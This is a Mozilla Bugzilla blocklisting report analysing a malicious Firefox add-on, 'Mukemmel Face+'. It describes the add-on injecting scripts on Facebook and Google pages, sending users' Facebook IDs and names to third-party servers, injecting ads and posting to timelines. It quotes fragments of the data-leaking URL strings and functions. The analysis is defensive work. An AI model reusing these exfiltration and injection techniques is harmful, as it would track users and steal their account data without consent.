Persona is no longer an option for authentication on BMO. For more details see Persona Deprecated.
Last Comment Bug 748993 - Malicious "Mukemmel Face+" add-on
: Malicious "Mukemmel Face+" add-on
Product: Toolkit
Classification: Components
Component: Blocklisting (show other bugs)
: unspecified
: All All
: -- normal (vote)
: ---
Assigned To: Jorge Villalobos [:jorgev]
: Jorge Villalobos [:jorgev]
Depends on:
  Show dependency treegraph
Reported: 2012-04-25 15:07 PDT by MarkH
Modified: 2016-03-07 15:30 PST (History)
4 users (show)
See Also:
Crash Signature:
QA Whiteboard:
Iteration: ---
Points: ---
Has Regression Range: ---
Has STR: ---

Attachments (90.12 KB, application/octet-stream)
2012-04-25 15:07 PDT, MarkH
no flags Details

Description MarkH 2012-04-25 15:07:12 PDT
Created attachment 618446 [details]

User Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_7_3) AppleWebKit/535.19 (KHTML, like Gecko) Chrome/18.0.1025.163 Safari/535.19

Steps to reproduce:

Downloaded add-on from

Actual results:

loads "adobeflashplayer.js" from XPI

    code is based on the less malicious "SocialFixer" plugin

    looks to see if it's on a Facebook or Google domain

    uses HTML5 local storage plus cookies to maintain config/state

    injects a <script> tag to load<random_num> when on Facebook
    or,  injects a <script> tag to load<random_num> when on Google

    loads your public details into the DOM via a call to<uid>&callback=cins
    contains the spam URL
    injects either a <script> tag to load<1|2>&amtasak=<uid>&x=<random_number>
    ... or a <script> tag to load<1|2>&amtasak=<uid>&x=<random_number>
    and a <script> tag to load

    empty at the time the analysis was done
offline.js / zaza.js (same file):

    JS to install a font

    not an image file, but javascript
    sends your FB UID to"+FB_UID+"&ck="+userKey+"&me="+FB_UID (since this loads on every Facebook page load, it also sends the current Facebook URL you're viewing as a referrer, allowing them to track you on Facebook)

    has the ability to send your FB UID and name to'+FB_NAME+'&fbid='+FB_UID
    sends your FB UID to'+FB_UID+'
    sends your FB UID to'+a+'/'+FB_UID+'.css
    makes an Ajax request to<random_number>
    injects ads by appending to the FB ad unit via "<iframe id='"+pubid+"_fr' src='"+reklam+"?umtt="+utma+"&umte="+USER_TYPE+"&ub="+SEXE+"' style='border:0px;margin-left:0px' width='230' height='620' scrolling='no' ></iframe>"
    sends your name and FB UID when you submit a bug report via"&name="+FB_NAME+&fbid="+FB_UID
    sends your name and FB UID to"+tableau_aid+"&id_user="+FB_UID+
    posts details of what you do on Facebook via 
    function setPost(aid,what){   
        +"&type="+what,vide, function(){});	
    function unsetPost(aid,what){
        +"&type="+what,vide, function(){});	
    posts status updates to your Timeline / Wall

Expected results:

It shouldn't post your Facebook account information to a 3rd party server or post as you on Facebook without your consent.
Comment 1 Jorge Villalobos [:jorgev] 2012-04-25 16:31:30 PDT
ID: {45147e67-4020-47e2-8f7a-55464fb535aa}
Comment 2 Jorge Villalobos [:jorgev] 2012-04-25 16:33:41 PDT

Note You need to log in before you can comment on or make changes to this bug.